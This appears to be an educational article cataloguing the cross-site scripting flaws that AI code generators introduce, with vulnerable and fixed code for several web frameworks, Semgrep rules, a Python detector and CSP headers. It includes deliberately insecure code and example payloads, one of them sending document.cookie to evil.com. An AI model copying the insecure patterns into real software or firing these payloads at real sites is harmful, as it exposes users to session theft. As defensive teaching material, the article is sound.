XSS Vulnerabilities from AI-Generated Code
Analysis of cross-site scripting patterns produced by LLM code generation, covering DOM XSS, reflected XSS, and framework-specific bypass patterns.
Overview
Cross-site scripting (XSS) is the second most common vulnerability class that LLMs introduce into generated code, after SQL injection. AI coding assistants frequently generate code that renders user input without proper encoding, uses innerHTML or dangerouslySetInnerHTML for dynamic content, and constructs HTML strings through template literals. These patterns create reflected, stored, and DOM-based XSS vulnerabilities.
The problem is particularly insidious because LLM-generated XSS often appears in code that is functionally correct. The application works as expected during manual testing, and only careful security review reveals that user input flows to the DOM without sanitization. This article catalogs the most common XSS patterns in AI-generated code and provides detection and prevention strategies.
Why LLMs Generate XSS
Training Data Bias
LLMs learn from publicly available code, tutorials, and documentation. XSS-vulnerable patterns dominate training data for the same reasons SQL injection does:
- Tutorial simplification: Tutorials often skip output encoding to focus on functionality.
- Legacy code prevalence: Older JavaScript and PHP code rarely uses modern XSS prevention.
- Framework escape hatches: React's
dangerouslySetInnerHTMLand Angular'sbypassSecurityTrustHtmlappear in documentation and tutorials about how to render rich content.
# Catalog of XSS patterns commonly generated by AI coding assistants
XSS_PATTERN_CATALOG = {
"innerHTML_assignment": {
"severity": "critical",
"frequency": "very_common",
"framework": "vanilla_js",
"insecure": '''
// LLM-generated: Display user search query
function displaySearchResults(query, results) {
document.getElementById("search-header").innerHTML =
`<h2>Results for: ${query}</h2>`;
// XSS: query is rendered directly as HTML
}
''',
"secure": '''
// Secure: Use textContent for plain text
function displaySearchResults(query, results) {
const header = document.getElementById("search-header");
const h2 = document.createElement("h2");
h2.textContent = `Results for: ${query}`;
header.replaceChildren(h2);
}
''',
"cwe": "CWE-79",
},
"react_dangerously_set": {
"severity": "critical",
"frequency": "common",
"framework": "react",
"insecure": '''
// LLM-generated: Render user bio with formatting
function UserBio({ bio }) {
return (
<div dangerouslySetInnerHTML={{ __html: bio }} />
);
// XSS: bio may contain script tags
}
''',
"secure": '''
// Secure: Use DOMPurify for sanitized HTML rendering
import DOMPurify from "dompurify";
function UserBio({ bio }) {
const sanitized = DOMPurify.sanitize(bio, {
ALLOWED_TAGS: ["b", "i", "em", "strong", "p", "br"],
ALLOWED_ATTR: [],
});
return (
<div dangerouslySetInnerHTML={{ __html: sanitized }} />
);
}
''',
"cwe": "CWE-79",
},
"flask_template_bypass": {
"severity": "critical",
"frequency": "common",
"framework": "flask",
"insecure": '''
# LLM-generated: Render user profile page
from flask import Flask, request
from markupsafe import Markup
app = Flask(__name__)
@app.route("/profile")
def profile():
name = request.args.get("name", "")
# LLM uses Markup() to "fix" escaping issues in templates
return f"<html><body><h1>Welcome, {Markup(name)}</h1></body></html>"
# XSS: Markup() marks the string as safe, bypassing auto-escaping
''',
"secure": '''
# Secure: Use Jinja2 templates with auto-escaping
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route("/profile")
def profile():
name = request.args.get("name", "")
# Jinja2 auto-escapes variables by default
return render_template_string(
"<html><body><h1>Welcome, {{ name }}</h1></body></html>",
name=name,
)
''',
"cwe": "CWE-79",
},
"django_mark_safe": {
"severity": "critical",
"frequency": "moderate",
"framework": "django",
"insecure": '''
# LLM-generated: Custom template tag
from django.utils.safestring import mark_safe
def render_user_content(content):
"""Render user-submitted content with formatting."""
# LLM uses mark_safe to suppress Django's auto-escaping
formatted = content.replace("\\n", "<br>")
return mark_safe(formatted)
# XSS: user content is marked safe without sanitization
''',
"secure": '''
# Secure: Escape first, then add safe formatting
from django.utils.html import escape
from django.utils.safestring import mark_safe
def render_user_content(content):
"""Render user-submitted content with formatting."""
# Escape user content first
escaped = escape(content)
# Then add safe formatting
formatted = escaped.replace("\\n", "<br>")
return mark_safe(formatted)
''',
"cwe": "CWE-79",
},
"jquery_html_method": {
"severity": "critical",
"frequency": "common",
"framework": "jquery",
"insecure": '''
// LLM-generated: Display notification
function showNotification(message) {
$("#notification").html(`<div class="alert">${message}</div>`);
// XSS: message rendered as HTML
}
''',
"secure": '''
// Secure: Use .text() for user content
function showNotification(message) {
const alert = $("<div>").addClass("alert").text(message);
$("#notification").empty().append(alert);
}
''',
"cwe": "CWE-79",
},
}DOM-Based XSS from AI Code
URL Parameter to DOM Patterns
LLMs frequently generate code that reads URL parameters and inserts them into the DOM without encoding:
# Common DOM XSS patterns from LLMs
DOM_XSS_PATTERNS = {
"url_param_to_innerhtml": {
"code": '''
// LLM generates this for "read query param and display it"
const params = new URLSearchParams(window.location.search);
const name = params.get("name");
document.getElementById("greeting").innerHTML = `Hello, ${name}!`;
''',
"exploit": "?name=<img src=x onerror=alert(document.cookie)>",
"fix": "Use textContent instead of innerHTML",
},
"hash_to_dom": {
"code": '''
// LLM generates this for "single page app routing"
function loadPage() {
const page = window.location.hash.substring(1);
document.getElementById("content").innerHTML = `<h1>${page}</h1>`;
}
window.addEventListener("hashchange", loadPage);
''',
"exploit": "#<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>",
"fix": "Validate hash against allowlist, use textContent",
},
"postmessage_to_dom": {
"code": '''
// LLM generates this for "receive messages from iframe"
window.addEventListener("message", (event) => {
document.getElementById("output").innerHTML = event.data;
});
''',
"exploit": "Parent frame sends HTML with script payload",
"fix": "Validate event.origin, use textContent, sanitize data",
},
}JavaScript Template Literal Injection
LLMs commonly generate template literals that construct HTML, creating XSS sinks:
# Template literal XSS patterns
TEMPLATE_LITERAL_XSS = '''
// Pattern 1: Building HTML tables from data (very common LLM output)
function renderUserTable(users) {
// INSECURE: LLM builds HTML via template literals
const rows = users.map(user => `
<tr>
<td>${user.name}</td>
<td>${user.email}</td>
<td>${user.bio}</td>
</tr>
`).join("");
document.getElementById("user-table").innerHTML = `
<table>
<thead><tr><th>Name</th><th>Email</th><th>Bio</th></tr></thead>
<tbody>${rows}</tbody>
</table>
`;
// Any field containing HTML (especially bio) creates XSS
}
// SECURE: Use DOM APIs
function renderUserTableSafe(users) {
const table = document.createElement("table");
const thead = document.createElement("thead");
const headerRow = document.createElement("tr");
["Name", "Email", "Bio"].forEach(text => {
const th = document.createElement("th");
th.textContent = text;
headerRow.appendChild(th);
});
thead.appendChild(headerRow);
table.appendChild(thead);
const tbody = document.createElement("tbody");
users.forEach(user => {
const row = document.createElement("tr");
[user.name, user.email, user.bio].forEach(value => {
const td = document.createElement("td");
td.textContent = value; // Safe: textContent auto-escapes
row.appendChild(td);
});
tbody.appendChild(row);
});
table.appendChild(tbody);
const container = document.getElementById("user-table");
container.replaceChildren(table);
}
'''Framework-Specific Patterns
React XSS Patterns
# React-specific XSS patterns from AI code generation
REACT_XSS_PATTERNS = {
"dangerouslySetInnerHTML_user_content": {
"frequency": "common",
"context": "LLMs suggest this for rendering formatted user content",
"insecure_code": '''
function Comment({ comment }) {
// LLM generates this when asked to "render markdown comments"
return (
<div className="comment">
<strong>{comment.author}</strong>
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
</div>
);
}
''',
"why_llm_suggests_this": (
"Training data contains many examples of rendering "
"HTML content with dangerouslySetInnerHTML. LLMs don't "
"distinguish between trusted and untrusted HTML."
),
},
"href_javascript_protocol": {
"frequency": "moderate",
"context": "LLMs generate user-controllable href attributes",
"insecure_code": '''
function UserLink({ user }) {
// LLM generates this for "link to user website"
return (
<a href={user.website}>Visit {user.name}'s site</a>
);
// XSS if user.website = "javascript:alert(document.cookie)"
}
''',
"secure_code": '''
function UserLink({ user }) {
// Validate URL protocol
const isValidUrl = (url) => {
try {
const parsed = new URL(url);
return ["http:", "https:"].includes(parsed.protocol);
} catch {
return false;
}
};
if (!isValidUrl(user.website)) return null;
return (
<a href={user.website} rel="noopener noreferrer">
Visit {user.name}'s site
</a>
);
}
''',
},
"style_injection": {
"frequency": "low",
"context": "LLMs generate dynamic styles from user input",
"insecure_code": '''
function ThemedComponent({ userTheme }) {
// LLM generates this for "custom theme support"
return (
<div style={{ background: userTheme.backgroundColor }}>
Content
</div>
);
// Style injection if userTheme comes from untrusted source
}
''',
},
}Python Web Framework Patterns
# Flask and Django XSS patterns from AI code generation
from flask import Flask, request, render_template_string, jsonify
app = Flask(__name__)
# INSECURE Pattern 1: String-based HTML response (very common LLM output)
@app.route("/search")
def search_insecure():
"""LLM generates this for 'create a search endpoint'."""
query = request.args.get("q", "")
results = perform_search(query) # Assume this returns results
# LLM constructs HTML directly with f-strings
html = f"""
<html>
<body>
<h1>Search Results for: {query}</h1>
<ul>
{"".join(f"<li>{r}</li>" for r in results)}
</ul>
</body>
</html>
"""
return html # XSS: query and results rendered without escaping
# SECURE Pattern 1: Use Jinja2 templates
@app.route("/search")
def search_secure():
"""Secure version using Jinja2 auto-escaping."""
query = request.args.get("q", "")
results = perform_search(query)
# Jinja2 auto-escapes {{ }} variables
return render_template_string("""
<html>
<body>
<h1>Search Results for: {{ query }}</h1>
<ul>
{% for r in results %}
<li>{{ r }}</li>
{% endfor %}
</ul>
</body>
</html>
""", query=query, results=results)
# INSECURE Pattern 2: JSON response with HTML content
@app.route("/api/preview")
def preview_insecure():
"""LLM generates this for 'create content preview API'."""
content = request.json.get("content", "")
# LLM wraps content in HTML for preview
preview_html = f"<div class='preview'>{content}</div>"
return jsonify({"html": preview_html})
# XSS if frontend renders this HTML without sanitization
# SECURE Pattern 2: Return plain text, let frontend render safely
@app.route("/api/preview")
def preview_secure():
"""Secure version returning structured data."""
content = request.json.get("content", "")
return jsonify({
"text": content, # Frontend uses textContent to render
"word_count": len(content.split()),
})
def perform_search(query):
"""Placeholder search function."""
return [f"Result for {query}"]Detection Strategies
Semgrep Rules for LLM-Generated XSS
SEMGREP_XSS_RULES = """
rules:
- id: js-innerhtml-user-input
patterns:
- pattern: |
$EL.innerHTML = $VALUE
- pattern-not: |
$EL.innerHTML = ""
- pattern-not: |
$EL.innerHTML = DOMPurify.sanitize(...)
message: >
innerHTML assignment with potentially untrusted content.
Use textContent for plain text or DOMPurify.sanitize() for HTML.
AI coding assistants commonly generate this pattern.
languages: [javascript, typescript]
severity: WARNING
metadata:
cwe: CWE-79
- id: react-dangerously-set-innerhtml
pattern: |
dangerouslySetInnerHTML={{ __html: $VALUE }}
message: >
dangerouslySetInnerHTML used. Ensure $VALUE is sanitized with
DOMPurify. AI assistants frequently suggest this for rendering
formatted content.
languages: [javascript, typescript]
severity: ERROR
metadata:
cwe: CWE-79
- id: flask-fstring-html-response
patterns:
- pattern: |
return f"<...$VAR..."
message: >
Flask endpoint returns f-string containing HTML. Use
render_template or render_template_string with Jinja2
auto-escaping instead.
languages: [python]
severity: ERROR
metadata:
cwe: CWE-79
- id: django-mark-safe-user-input
patterns:
- pattern: |
mark_safe($TAINTED)
- pattern-not: |
mark_safe(escape($TAINTED))
message: >
mark_safe() called on potentially unsanitized input.
Escape content before marking safe. AI assistants use
mark_safe to suppress escaping without understanding the risk.
languages: [python]
severity: ERROR
metadata:
cwe: CWE-79
- id: js-document-write
pattern: document.write(...)
message: >
document.write() with dynamic content creates XSS risk.
Use DOM APIs instead. AI coding assistants generate this
for legacy-style code.
languages: [javascript]
severity: WARNING
metadata:
cwe: CWE-79
"""Automated XSS Testing for AI-Generated Code
import ast
import sys
from pathlib import Path
class FlaskXSSDetector(ast.NodeVisitor):
"""Detect XSS patterns in Flask applications generated by AI."""
def __init__(self, filename: str):
self.filename = filename
self.findings: list[dict] = []
def visit_Return(self, node: ast.Return):
"""Check return statements for HTML string construction."""
if node.value is None:
return
# Detect f-string returns with HTML
if isinstance(node.value, ast.JoinedStr):
for value in node.value.values:
if isinstance(value, ast.Constant) and isinstance(value.value, str):
if "<" in value.value and ">" in value.value:
self.findings.append({
"file": self.filename,
"line": node.lineno,
"type": "f-string HTML return",
"severity": "ERROR",
"message": "Return value constructs HTML via f-string. Use Jinja2 templates.",
})
return
self.generic_visit(node)
def visit_Call(self, node: ast.Call):
"""Check for mark_safe and Markup usage."""
if isinstance(node.func, ast.Name):
if node.func.id in ("mark_safe", "Markup"):
self.findings.append({
"file": self.filename,
"line": node.lineno,
"type": f"{node.func.id}() usage",
"severity": "WARNING",
"message": f"{node.func.id}() bypasses auto-escaping. Verify input is sanitized.",
})
self.generic_visit(node)
def scan_flask_xss(project_path: str) -> list[dict]:
"""Scan a Flask project for XSS vulnerabilities."""
all_findings = []
for py_file in Path(project_path).rglob("*.py"):
try:
source = py_file.read_text()
tree = ast.parse(source)
detector = FlaskXSSDetector(str(py_file))
detector.visit(tree)
all_findings.extend(detector.findings)
except (SyntaxError, UnicodeDecodeError):
pass
return all_findingsPrevention Framework
Content Security Policy
In addition to code-level fixes, deploy Content Security Policy headers to limit XSS impact:
# Flask middleware for CSP headers
from flask import Flask
app = Flask(__name__)
@app.after_request
def add_security_headers(response):
"""Add security headers to mitigate XSS from AI-generated code."""
response.headers["Content-Security-Policy"] = (
"default-src 'self'; "
"script-src 'self'; "
"style-src 'self' 'unsafe-inline'; "
"img-src 'self' data:; "
"font-src 'self'; "
"connect-src 'self'; "
"frame-ancestors 'none'; "
"base-uri 'self'; "
"form-action 'self'"
)
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
response.headers["X-XSS-Protection"] = "0" # Deprecated but set to 0
return responseDeveloper Guidance for AI-Assisted Development
| Context | Insecure AI Pattern | Secure Alternative |
|---|---|---|
| Display user text | innerHTML = userText | textContent = userText |
| Render formatted content | dangerouslySetInnerHTML={{ __html: content }} | DOMPurify.sanitize(content) then dangerouslySetInnerHTML |
| Flask HTML response | return f"<html>...{user_input}..." | return render_template("page.html", input=user_input) |
| Django template | mark_safe(user_content) | escape(user_content) then mark_safe() |
| URL construction | href={user_url} | Validate protocol is http: or https: first |
| Build HTML table | Template literals with ${} | document.createElement() + textContent |
References
- CWE-79: Improper Neutralization of Input During Web Page Generation — https://cwe.mitre.org/data/definitions/79.html
- "Do Users Write More Insecure Code with AI Assistants?" — Perry et al., Stanford University, 2023 — https://arxiv.org/abs/2211.03622
- OWASP Cross-Site Scripting Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html
- DOMPurify — https://github.com/cure53/DOMPurify
- Semgrep XSS Rules — https://semgrep.dev/p/xss
- React Security Best Practices — https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html